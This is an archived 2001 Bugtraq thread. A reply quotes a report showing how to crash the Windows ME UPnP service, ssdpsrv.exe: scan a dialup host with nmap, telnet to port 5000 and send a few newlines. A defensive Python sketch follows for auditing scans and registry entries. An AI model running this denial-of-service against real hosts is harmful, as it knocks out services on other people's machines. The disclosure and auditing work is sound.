RE: Ssdpsrv.exe in WindowsME

From: Martin L. Drury Jr. (mdrury@ads-corp.com)
Date: Fri Oct 19 2001 - 05:21:58 PDT

    Last night after I got home from work, I checked my Dell Laptop (which came
    with ME preinstalled) and it too is running the ssdpsrv.  The only things
    I've installed on it since I purchased it are Office 2000, IE6, and the
    software/support drivers for my digital camera.  All of which I don't think
    would have turned it on (although I could be wrong).
    
    After reading up on UPnP though, I think the triggering item might be Home
    Networking, or whatever it's called in ME.  I don't personally recall
    turning it on, as my laptop automagically selected all the proper settings
    for my ISP (which was kinda nice, and scary at the same time).  The
    knowledge base article seems to suggest that UPnP is not turned on by
    default, but it's possible some OEMs might have it enabled.
    
    Finally, I was not able to duplicate the crash, even though I did receive
    the 400 Bad Request response.  Of course, I was busy fixing dinner at the
    time as well, so that might not mean anything ;)
    
    Martin L. Drury Jr.
    Advance Data Systems, Inc.
    502-228-3396 x117
    mdrury@ads-corp.com
    
    > -----Original Message-----
    > From: milo omega [mailto:mtwoarat_private]
    > Sent: Wednesday, October 17, 2001 8:46 PM
    > To: bugtraqat_private
    > Subject: Ssdpsrv.exe in WindowsME
    >
    >
    > By connecting to a computer running Ssdpsrv you are able to crash the
    > Ssdpsrv server.
    >
    > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
    > This service comes standard with the WindowsME installation.
    >
    > The Ssdpsrv.exe server is started at boot.
    > Here is the registry entry:
    >   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
    > Here is the file that starts the server:
    >   c:\windows\system\ssdpsrv.exe
    >
    > For information about UPnP go here:
    >   http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
    >
    > Upon running a scan on a computer running the server I get the following:
    > <snip>
    >   bash-2.05$ nmap -sT 165.121.234.217
    >   Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
    >   Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
    >   (The 1547 ports scanned but not shown below are in state: closed)
    >   Port       State       Service
    >   139/tcp    open        netbios-ssn
    >   5000/tcp   open        fics
    >   Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
    > </snap>
    >
    > Method to crash Ssdpsrv:
    >   Connect to the computer on port 5000.
    >   Send 3 to 5 newline characters.
    >   You then get an error and are disconnected.
    > <snip>
    >   bash-2.05$ telnet 165.121.234.217 5000
    >   Trying 165.121.234.217...
    >   Connected to 165.121.234.217.
    >   Escape character is '^]'.
    >
    >
    >
    >   HTTP/1.1 400 Bad Request
    >
    >   Connection closed by foreign host.
    >   bash-2.05$
    > </snap>
    >
    > Here is the error caused by the crash:
    >   Ssdpsrv has caused an error in MSVCRT.DLL.
    >   Ssdpsrv will now close.
    >   If you continue to experience problems,
    >   try restarting your computer.
    >
    > This causes the server crash and closes port 5000.
    > Either you must restart the server by manually running ssdpsrv.exe
    > or reboot.
    >
    > shouts to pulltheplug #c.
    > :o
    >
    



    This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 16:02:03 PDT
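
An audit sketch for administrators following this thread, added here and not part of either post: it flags hosts in your own nmap text output that show 5000/tcp open, and checks a registry export for an ssdpsrv.exe entry under the RunServices key the original report names. The function names, the sample scan and export, the REGEDIT4 export layout and the value name "SSDPSRV" are assumptions constructed for the example.

```python
import re
# Constructed sample scan (documentation addresses, not the host from the post).
SAMPLE_SCAN = """\
Interesting ports on host-a.example (192.0.2.10):
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   open        fics

Interesting ports on host-b.example (192.0.2.11):
Port       State       Service
139/tcp    open        netbios-ssn
"""
# Constructed sample export; the value name "SSDPSRV" is an assumption.
SAMPLE_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"SSDPSRV"="c:\\windows\\system\\ssdpsrv.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"""

HOST_RE = re.compile(r"^Interesting ports on (\S*)\s*\(([\d.]+)\):")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\b")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
RUNSERVICES = r"hkey_local_machine\software\microsoft\windows\currentversion\runservices"

def hosts_with_open_port(scan_text, port=5000, proto="tcp"):
    """Return [(hostname, ip)] for every scanned host showing port/proto open."""
    found, current = [], None
    for line in map(str.strip, scan_text.splitlines()):
        host, port_m = HOST_RE.match(line), PORT_RE.match(line)
        if host:
            current = host.groups()          # start of a new host section
        elif port_m and current and (int(port_m[1]), port_m[2]) == (port, proto):
            found.append(current)
    return found

def autostart_entries(reg_text, needle="ssdpsrv.exe"):
    """Return {value name: data} under RunServices whose data mentions needle."""
    hits, in_key = {}, False
    for line in map(str.strip, reg_text.splitlines()):
        val = VALUE_RE.match(line)
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == RUNSERVICES   # only this key counts
        elif in_key and val and needle in val[2].lower():
            hits[val[1]] = val[2].replace("\\\\", "\\")  # undo .reg escaping
    return hits
```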